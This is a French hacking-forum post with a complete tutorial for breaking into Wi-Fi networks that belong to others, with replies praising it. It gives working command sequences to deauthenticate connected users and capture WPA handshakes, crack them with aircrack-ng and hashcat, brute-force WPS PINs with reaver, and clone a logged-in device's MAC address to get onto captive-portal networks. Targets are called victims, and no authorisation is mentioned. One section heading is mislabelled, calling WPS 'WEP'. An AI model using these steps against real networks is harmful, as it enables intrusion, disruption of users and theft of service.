Aller au contenu
keyboard_arrow_down
account_circle Se connecter

Connexion

• Non recommandé sur les ordinateurs partagés

• Mot de passe oublié ?

Ou connectez-vous avec l’un de ces services

person_add S’inscrire
hydrack/promo

JuneDay

[ WIFI HACKING ] TUTO COMPLET SUR LE HACKING WIFI

Messages recommandés

Salut 0,

Aujourd’hui comme promis je vais essayer de vous faire un guide le plus complet possible sur le cracking de wifi.

Sommaire : 

1 - Comment sont protéger les réseaux wifi ?

a - WEP

b - WPA/WPA-2

c - WPS

d - Wifi publiques avec page de login

2 - Prérequis :

a - Logiciels

b - Matériels

3 - Attaquer un réseau WPA/WPA-2 :

a - Théorie

b - Pratique

4 - Attaquer un réseau WPS :

a - Théorie

b - Pratique

5 - Attaquer un réseau public avec page de login :

a - Théorie

b - Pratique

1 - Comment sont protéger les réseaux wifi ?

De nos jours il devient de plus en plus difficile d'hacker des routeurs wifi qui ne nous appartiennent pas. Par chance ( ou pas ) il reste encore des vecteurs d'attaques fonctionnels ou simplement des vieux routeurs jamais mis à jour.

a - WEP

Le protocole d'encryptage le plus simple à hacker, et de loin. Sa faible sécurité le rend de plus en plus rare à trouver c'est pourquoi je ne le couvrirait pas dans ce tutoriel. Cependant si vous voulez quand même en savoir plus voici un lien qui peut vous intéresser : https://www.firediy.fr/article/cracker-une-cle-wep-sans-client-connecte. L'article date de 2012, pour vous dire à quel point c'est vieux.

b - WPA/WPA-2

C'est le protocole le plus utilisé pour sécuriser une connexion. Il est très robuste et fonctionne via un procédé que l'on appelle "4 way handshake". Il est possible de réaliser une attaque brute-force (que l'on verra plus tard) mais celle-ci peut prendre des années.

c - WEP

Le WEP est une méthode d'identification mise en place pour faciliter la connexion à un routeur. Cette facilité l'a rendu une cible évidente pour les hackers. Même si de nombreuses mesures ont été mises en place pour le sécurisé cela reste un vecteur d'attaque viable car beaucoup moins long et BEAUCOUP moins intensif que le crack de WPA.

d - Wifi publiques avec page de login

Nous pouvons trouver des réseaux publics un peu partout, aéroport, hôtels, cafés. Aussi de nombreux FAI ont mis en place des réseaux publiques dans toutes les boxs. Nous verrons qu'il est très facile de se faire passer pour quelqu'un d'autres et même s’il est impossible de réaliser des audits de réseau il est facile d'avoir accès à internet gratuitement.

2 - prérequis :

a - Logiciels :

Pour la réalisation de ces tutoriels vous aurez besoins d'une distribution linux, car même si la suite aircrack-ng est disponible sous Windows de nombreux outils vous seront inaccessible.

Voici donc une liste de tous les tools utilisés :

- La suite aircrack-ng

- Pixiewps

- Macchanger

- Reaver

- Hashcat

- Wash

/!\ Toutes commandes sont à lancer avec les droits sudo !

b - Materiels :

Il vous faudra un carte wifi compatible Linux, mode moniteur et injection de paquets. Il est possible que celle intégré à votre machine ai toutes ces options. Sinon je vous conseille la ALPHA AWUS036NHA qui est parfaite.

3 - Attaquer un réseau WPA/WPA-2 :

a - Théorie

Comme dit dans l'introduction lors de l'utilisation du WPA les mots de passes sont chiffrés, pour être plus précis la taille de mot de passe minimal est de 8 et le sel est l'ESSID du routeur. Heureusement pour nous lors de l'attaque de ce protocole on n’est pas obligé de faire des millions de requêtes au routeur. En effet le hash du mot de passe nous est envoyé lors du 4 way handshake. Notre but est donc de récupérer ce handshake puis de chiffrer tous les mots de passes possibles en suivant le même algorithme jusqu'à tomber sur le même hash. Ce qui fait que cette attaque n'est pas très concluante viens du fait que cet algorithme de hashage est très demandant en ressource et prends donc beaucoup de temps.

b - Pratique

Pour cela nous aurons besoins de aircrack-ng et quelques autres tools optionnels tels que hashcat ou encore Mentalist.

Première étape : Mettre sa carte en mode moniteur.

Vous allez déjà récupérer le nom de votre carte wifi :

ip a

Pour la commande suivante remplacez wlan0 par le nom de votre carte wifi, je vais donc la mettre en mode moniteur

airmon-ng start wlan0

A la fin de l'output vous avez le nouveau nom de votre carte, pour moi "wlan0mon"

Deuxième étape : Trouver votre victime.

Afin de scanner les réseaux wifi vous allez faire :

airodump-ng wlan0mon

En laissant tourner le programme quelques secondes vous allez voir plusieurs réseaux wifi dans le tableau supérieur (pour l'instant on s'en fou du tableau en dessous). Lorsque votre victime s'affiche stoppez le scan avec CTRL+C et récupérer son BSSID (adresse mac). Dans la suite lorsque vous verrez "BSSID" dans une commande remplacée par le bssid de votre victime. Afin de clarifier l'output du airodump nous allons uniquement scanner notre victime et enregistrer les infos dans des fichiers appelé "tuto".

airodump-ng wlan0mon --bssid BSSID -w tuto

Ici deux possibilités, soit vous attendez patiemment qu'une personne se connecte au routeur soit vous déconnecter une personne déjà connectée pour la forcer à se reconnecter. Pour la deuxième option ouvrez un deuxième terminal :

aireplay-ng --deauth 5 -a BSSID wlan0mon

Vous avez déconnecté les utilisateurs du routeur, si vous revenez dans le premier terminal, à la première ligne vous devriez trouver le mot "handshake" sur la première ligne. Si ce n'est pas le cas, personne n'est connecté à votre victime donc attendez un peux et retentez l'étape précédente. Sinon vous devriez trouver un fichier nommé "tuto*.cap", c'est votre handshake.

Troisième étape : crack du handshake.

Ici tout dépends de ce que vous voulez faire, par exemple si vous savez que le mot de passe n'est pas celui de base vous voudrez faire une attaque par dictionnaire ( pour en créer un customisé utilisez Mentalist) si par contre vous n'avez aucune informations sur votre victime vous feriez mieux de réaliser une attaque brute-force. Dans tous les cas vous avez le choix entre aircrack-ng ou hashcat. Les deux se valent d'un point si vous utilisez votre cpu, cependant hashcat permet de réaliser l'attaque via votre GPU (beaucoup plus performant). Je vais donc vous montrer quelques commandes possibles :

crunch 8 8 | aircrack-ng -e ESSID -w – votrefichier.cap           #Permet de tester tous les mots de passes de 8 caractères

aircrack-ng -e ESSID -w votredictionnaire.txt votrefichier.cap    #Permet de tester tous les mots de passes contenuent dans votredictionnaire.txt

hashcat -m 2500 -w 3 votrefichier.hccapx votredictionnaire.txt    #Permet de tester tous les mots de passes contenuent dans votredictionnaire.txt avec hashcat

hashcat -m 2500 -a 3 votrefichier.hccapx -1 ?l?d ?1?1?1?1?1?1?1?1 #Permet de brute-force tous les mots de passes de 8 caractères

/!\ Pour toute utilisation de hashcat je vous conseille windows, les drivers sont plus performant. Aussi regardez quelques tutos pour son utilisation. Il y a des petites manipulations qui permettent de bien meilleures performances. (4000 mdp/s à 84000 mdp/s pour moi)

Après de longues heures (voir années) vous avez votre mot de passe !

4 - Attaquer un réseau WPS :

a - Théorie

Le WPS est un PIN de 8 caractères uniquement numérique (Ex : 11111111) ce qui limite énormément les possibilités. Encre pire chaque paire de 4 pins est testable indépendamment de l'autre. Malheureusement c'est trop beau pour être vrai, en effet la plupart des routeurs ont mis en place des sécurités comme des locks au bout de quelques mauvais try. Ici il n'est pas toujours possible de faire l'attaque en hors ligne (seul certain cheapset sont faillibles). Il va donc falloir envoyer toutes les requêtes au routeur directement.

b - Pratique

Lire la première étape pour le WPA.

Pour cette étape nous allons utiliser un autre tool, wash. Il permet de scanner les réseaux wifi avec le WPS d'activé. Pour se faire, d'abords il faut up sa carte :

ifconfig wlan0mon up

Puis scannez :

wash -i wlan0mon

Attendez quelques secondes et choisissez votre victime. Il va vous falloir son BSSID, qui sera appelé "BSSID" dans les prochaines commandes, ainsi que le channel que nous appellerons CHANNEL.

Troisième étape : L'attaque.

Ici nous allons utiliser reaver, il va permettre de réaliser l'attaque en autopilote :

reaver -i mon0 -c CHANNEL -b BSSID-vv -L -N -d 15 -T .5 -r 3:15

Cette attaque va prendre plusieurs heures, et encore plus si le router se lock. Heureusement reaver garde sa progression en mémoire. Vous pouvez stopper et relancer l'attaque quand vous voulez.

Quatrième étape : Et si le routeur est faillible à l'attaque hors ligne ?

Cela ne coute rien de tester, alors pour savoir si un routeur est faillible proche de vous je vous conseille mon script : https://0day.live/sujet/1117-wifi-hacking-auto-pixie-dust/

5 - Attaquer un réseau public avec page de login :

a - Théorie

De loin l'attaque la plus simple mais aussi la moins rependu. Le seul moyen qu'a un routeur pour vous identifier est votre adresse MAC. Dans cette attaque le but est de trouver un appareil déjà loggé et d'usurper son identité.

b - Pratique

Lire la première étape pour le WPA.

Afin de trouver notre victime nous allons restreindre la recherche aux routeurs ouverts. Pour se faire :

airodump-ng wlan0mon --encrypt OPN

Une fois que vous trouvez votre victime, nous allons nous focaliser sur elle. Dans les prochaines commandes nous utiliserons BSSID pour représenter son bssid. Il est possible que vous deviez laisser cette commande tourner plusieurs heures pour enfin trouver quelqu'un de connecter. Pour savoir si la personne est connectée nous allons nous intéresser au tableau du bas. Si l'appareil échange beaucoup de paquets avec le routeur c'est qu'il est connecté.

airodump-ng wlan0mon -b BSSID -a -w tuto

Sachez que les transferts de paquets ne restent pas affichés indéfiniment, pour un log de toutes les transactions ouvrez le fichier tuto*.csv.

Troisième étape : L'usurpation d'identité.

L'adresse mac que vous voulez usurper se trouve dans la colonne "STATION", nous l'appellerons MAC dans les prochaines commandes. Nous allons donc maintenant changer notre adresse mac.

airmon-ng stop wlan0mon  #On quitte le mode monitor

ifconfig wlan0 down      #On désactive la carte wifi

macchanger -m MAC wlan0  #On change l'adresse mac

ifconfig wlan0 up        #On réactive la carte wifi

Quatrième étape : Enjoy l'internet gratuit.

Connectez-vous au réseau ouvert, et si tout c'est bien passé vous avez accès à internet.

Je vous remercie énormément si vous avez tout lu, vous pouvez laisser un like car cela m’a pris beaucoup de temps à écrire et à comprendre. Pour plus de précisions je vous conseils de jeter un coup d'œil à mes sources.

Sources :

https://rsseau.fr/hacking/2017/10/31/hacker-password-wpa-wifi.html

https://www.aircrack-ng.org/doku.php?id=cracking_wpa

https://outpost24.com/blog/wps-cracking-with-reaver

https://null-byte.wonderhowto.com/how-to/hack-open-hotel-airplane-coffee-shop-wi-fi-with-mac-address-spoofing-0183387/

• Like 4
  • Merci 1

Dafuk, beaucoup trop clean :pepe_love:

Incroyable topic, très clair et explicite. Il faudrait plus de topics dans le genre sur le forum.

• Like 1

Une dinguerie, un grand merci :)